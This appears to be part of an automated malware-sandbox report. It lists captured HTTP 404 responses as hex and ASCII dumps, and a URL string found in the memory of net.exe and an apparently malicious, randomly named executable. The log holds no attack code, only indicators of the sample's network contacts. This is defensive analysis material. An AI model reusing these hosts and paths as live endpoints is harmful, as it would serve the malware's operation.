                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:26:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:26:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:26:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 15:26:36 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 15:26:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 15:26:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:26:59 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:27:47 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:27:50 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:27:52 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:27:55 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:27:59 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:28:01 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:28:04 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:28:07 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
